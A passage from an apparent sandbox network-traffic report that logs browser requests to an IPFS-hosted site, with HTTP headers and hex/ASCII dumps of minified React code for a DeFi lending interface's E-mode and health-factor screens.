                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 74 65 2e 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 3a 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 2c 22 20 74 72 61 6e 73 70 61 72 65 6e 74 22 29 2c 6d 62 3a 2e 35 7d 7d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 69 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 62 6f 72 64 65 72 53 74 79 6c 65 3a 22 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 22 34 70 78 20 34 70 78 20 30 20 34 70 78 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 22 2e 63 6f 6e 63 61 74 28 6e 21 3d 3d 61 7c 7c 74 3f 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 3a 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79
                                                                                                                                                                                                                                                  Data Ascii: tte.text.secondary:e.palette.divider," transparent"),mb:.5}}}),(0,s.jsx)(i.Z,{component:"span",sx:function(e){return{width:0,height:0,borderStyle:"solid",borderWidth:"4px 4px 0 4px",borderColor:"".concat(n!==a||t?e.palette.divider:e.palette.text.secondary
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 35 39 34 39 39 29 2c 69 3d 74 28 32 39 36 33 30 29 2c 6f 3d 28 74 28 36 37 32 39 34 29 2c 74 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65
                                                                                                                                                                                                                                                  Data Ascii: 59499),i=t(29630),o=(t(67294),t(85893));function c(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}re
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC449INData Raw: 63 74 69 6f 6e 28 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 6e 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 61 70 74 69 6f 6e 2c 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 65 2e 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 2c 6c 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 22 73 65 63 6f 6e 64 61 72 79 31 36 22 3a 72 2c 70 3d 65 2e 63 61 70 74 69 6f 6e 43 6f 6c 6f 72 2c 78 3d 65 2e 61 6c 69 67 6e 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 78 3f 22 63 65 6e 74 65 72 22 3a 78 2c 66 3d 28 30 2c 69 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72 6e 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: ction(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))}))}return e}var p=function(e){var n=e.caption,t=e.children,r=e.captionVariant,l=void 0===r?"secondary16":r,p=e.captionColor,x=e.align,u=void 0===x?"center":x,f=(0,i.Z)(e,a);return(0,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  73192.168.2.549790209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/7604-eabb8e5b8018f878.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15005
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoqovhhvcjgzfy3lnvkophkdcfc4luhfxk6l4mrnjrmm7nk7ah3m"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7604-eabb8e5b8018f878.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigoqovhhvcjgzfy3lnvkophkdcfc4luhfxk6l4mrnjrmm7nk7ah3m
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 62 65 62 61 37 34 33 30 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42beba74309-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 30 34 5d 2c 7b 37 36 39 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 6f 3d 74 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7604],{76920:function(e,r,t){var n,i,o=t(67294);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 70 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f
                                                                                                                                                                                                                                                  Data Ascii: ct.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function j(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).fo
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 31 29 2c 73 3d 74 28 34 38 39 34 39 29 2c 61 3d 74 28 38 30 32 32 37 29 2c 63 3d 74 28 32 39 36 33 30 29 2c 6c 3d 74 28 38 31 36 34 35 29 2c 64 3d 74 28 36 38 33 34 36 29 2c 75 3d 74 28 33 30 31 32 30 29 2c 78 3d 74 28 36 37 32 39 34 29 2c 6d 3d 74 28 34 31 30 32 34 29 2c 68 3d 74 28 39 32 33 39 31 29 2c 70 3d 74 28 36 39 33 33 31 29 2c 6a 3d 74 28 37 33 39 36 35 29 2c 76 3d 74 28 34 33 34 37 38 29 2c 66 3d 74 28 38 31 39 35 29 2c 67 3d 74 28 34 36 39 33 30 29 2c 62 3d 74 28 37 37 35 33 37 29 2c 45 3d 74 28 36 33 32 30 36 29 2c 79 3d 74 28 37 36 39 32 30 29 2c 49 3d 74 28 36 33 34 39 31 29 2c 4f 3d 74 28 36 37 39 31 36 29 2c 43 3d 74 28 39 33 36 30 38 29 2c 77 3d 74 28 35 37 38 32 34 29 2c 53 3d 74 28 37 38 39 34 34 29 2c 5a 3d 74 28 31 30 33 34 33 29 2c
                                                                                                                                                                                                                                                  Data Ascii: 1),s=t(48949),a=t(80227),c=t(29630),l=t(81645),d=t(68346),u=t(30120),x=t(67294),m=t(41024),h=t(92391),p=t(69331),j=t(73965),v=t(43478),f=t(8195),g=t(46930),b=t(77537),E=t(63206),y=t(76920),I=t(63491),O=t(67916),C=t(93608),w=t(57824),S=t(78944),Z=t(10343),
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3a 72 7d 29 7d 2c 42 3d 74 28 34 37 35 34 36 29 2c 52 3d 74 28 35 35 33 34 33 29 2c 55 3d 74 28 33 31 35 33 38 29 2c 57 3d 74 28 34 36 35 34 31 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 65 6d 6f 64 65 43 61 74 65 67 6f 72 69 65 73 2c 74 3d 65 2e 73 65 6c 65 63 74 65 64 45 6d 6f 64 65 2c 6e 3d 65 2e 73 65 74 53 65 6c 65 63 74 65 64 45 6d 6f 64 65 2c 69 3d 65 2e 75 73 65 72 45 6d 6f 64 65 3b 72 65 74 75 72 6e 28 30 2c 46 2e 6a 73 78 73 29 28 52 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 2c 77 69 64 74 68 3a 22 31 30 30 25 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 46 2e 6a 73 78 29 28 42 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30
                                                                                                                                                                                                                                                  Data Ascii: :r})},B=t(47546),R=t(55343),U=t(31538),W=t(46541),H=function(e){var r=e.emodeCategories,t=e.selectedEmode,n=e.setSelectedEmode,i=e.userEmode;return(0,F.jsxs)(R.Z,{sx:{mb:1,width:"100%"},children:[(0,F.jsx)(B.Z,{sx:{mb:1,color:"text.secondary"},children:(0
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 30 5d 3d 22 45 4d 4f 44 45 5f 44 49 53 41 42 4c 45 44 5f 4c 49 51 55 49 44 41 54 49 4f 4e 22 2c 65 5b 65 2e 43 4c 4f 53 45 5f 50 4f 53 49 54 49 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 3d 31 5d 3d 22 43 4c 4f 53 45 5f 50 4f 53 49 54 49 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 22 7d 28 6e 7c 7c 28 6e 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 4e 41 42 4c 45 3d 22 45 6e 61 62 6c 65 22 2c 65 2e 44 49 53 41 42 4c 45 3d 22 44 69 73 61 62 6c 65 22 2c 65 2e 53 57 49 54 43 48 3d 22 53 77 69 74 63 68 22 7d 28 69 7c 7c 28 69 3d 7b 7d 29 29 3b 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 6d 6f 64 65 2c 74 3d 65 2e 75 73 65 72 2c 4e 3d 28 30 2c 6a 2e 48 54 29 28 29 2c 6b 3d 4e
                                                                                                                                                                                                                                                  Data Ascii: 0]="EMODE_DISABLED_LIQUIDATION",e[e.CLOSE_POSITIONS_BEFORE_SWITCHING=1]="CLOSE_POSITIONS_BEFORE_SWITCHING"}(n||(n={})),function(e){e.ENABLE="Enable",e.DISABLE="Disable",e.SWITCH="Switch"}(i||(i={}));var V=function(e){var r=e.mode,t=e.user,N=(0,j.HT)(),k=N
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 3a 72 65 74 75 72 6e 28 30 2c 46 2e 6a 73 78 29 28 70 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 69 6e 66 6f 22 2c 73 78 3a 7b 6d 74 3a 36 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 54 6f 20 65 6e 61 62 6c 65 20 45 2d 6d 6f 64 65 20 66 6f 72 20 74 68 65 20 7b 30 7d 20 63 61 74 65 67 6f 72 79 2c 20 61 6c 6c 20 62 6f 72 72 6f 77 20 70 6f 73 69 74 69 6f 6e 73 20 6f 75 74 73 69 64 65 20 6f 66 20 74 68 69 73 20 63 61 74 65 67 6f 72 79 20 6d 75 73 74 20 62 65 20 63 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: ONS_BEFORE_SWITCHING:return(0,F.jsx)(p.v,{severity:"info",sx:{mt:6,alignItems:"center"},children:(0,F.jsx)(c.Z,{variant:"caption",children:(0,F.jsx)(o.cC,{id:"To enable E-mode for the {0} category, all borrow positions outside of this category must be clo
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 20 45 2d 4d 6f 64 65 22 29 7d 29 2c 74 65 26 26 21 55 26 26 28 30 2c 46 2e 6a 73 78 29 28 5a 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 4b 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 4d 7d 29 2c 30 3d 3d 3d 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 26 26 28 30 2c 46 2e 6a 73 78 29 28 70 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 77 61 72 6e 69 6e 67 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 45 6e 61 62 6c 69 6e 67 20 45 2d 4d 6f 64 65 20 6f 6e 6c 79 20 61 6c 6c 6f 77 73 20 79 6f 75 20 74 6f 20 62 6f 72 72 6f 77 20 61 73 73 65 74 73 20 62 65 6c 6f 6e 67 69 6e
                                                                                                                                                                                                                                                  Data Ascii: E-Mode")}),te&&!U&&(0,F.jsx)(Z.I,{networkName:K.name,chainId:M}),0===t.userEmodeCategoryId&&(0,F.jsx)(p.v,{severity:"warning",children:(0,F.jsx)(c.Z,{variant:"caption",children:(0,F.jsx)(o.cC,{id:"Enabling E-Mode only allows you to borrow assets belongin
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 65 72 22 2c 6d 78 3a 31 7d 2c 63 68 69 6c 64 72 65 6e 3a 30 21 3d 3d 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3f 28 30 2c 46 2e 6a 73 78 73 29 28 46 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 46 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 79 2e 5a 2c 7b 7d 29 7d 29 2c 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 31 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 50 2e 55 29 28 44 5b 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 5d 2e 6c 61 62 65 6c 29 7d 29 5d 7d 29 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74
                                                                                                                                                                                                                                                  Data Ascii: er",mx:1},children:0!==t.userEmodeCategoryId?(0,F.jsxs)(F.Fragment,{children:[(0,F.jsx)(l.Z,{sx:{fontSize:"12px"},children:(0,F.jsx)(y.Z,{})}),(0,F.jsx)(c.Z,{variant:"subheader1",children:(0,P.U)(D[t.userEmodeCategoryId].label)})]}):(0,F.jsx)(c.Z,{variant
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3d 58 3f 76 6f 69 64 20 30 3a 58 2e 69 64 29 3f 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 74 65 78 74 41 6c 69 67 6e 3a 22 65 6e 64 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 58 2e 61 73 73 65 74 73 2e 6a 6f 69 6e 28 22 2c 20 22 29 7d 29 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 6c 6c 20 41 73 73 65 74 73 22 7d 29 7d 29 7d 29 5d 7d 29 5d 7d 29 7d 29 2c 28 30 2c 46 2e 6a 73 78 29 28 77 2e 6a 7a 2c 7b 76 69 73 69 62 6c 65 48 66 43 68 61 6e 67 65 3a 21 21 58 2c 68 65 61 6c 74 68 46 61 63 74 6f 72 3a 74 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 2c 66 75 74 75 72 65 48 65 61 6c 74 68 46 61 63 74 6f 72 3a 4a 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 7d 29 2c 6f 65
                                                                                                                                                                                                                                                  Data Ascii: =X?void 0:X.id)?(0,F.jsx)(c.Z,{sx:{textAlign:"end"},children:X.assets.join(", ")}):(0,F.jsx)(c.Z,{children:(0,F.jsx)(o.cC,{id:"All Assets"})})})]})]})}),(0,F.jsx)(w.jz,{visibleHfChange:!!X,healthFactor:t.healthFactor,futureHealthFactor:J.healthFactor}),oe


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  74192.168.2.549792209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC739OUTGET /_next/static/chunks/4284-bbf96c7bcf282a59.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13036
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidmhbwmoen2dm76enqpnzshlj6ozuvolwgbyrp4mf2yfvqemgjwse"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4284-bbf96c7bcf282a59.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidmhbwmoen2dm76enqpnzshlj6ozuvolwgbyrp4mf2yfvqemgjwse
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 65 65 63 31 39 34 32 65 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42eec1942e0-EWR
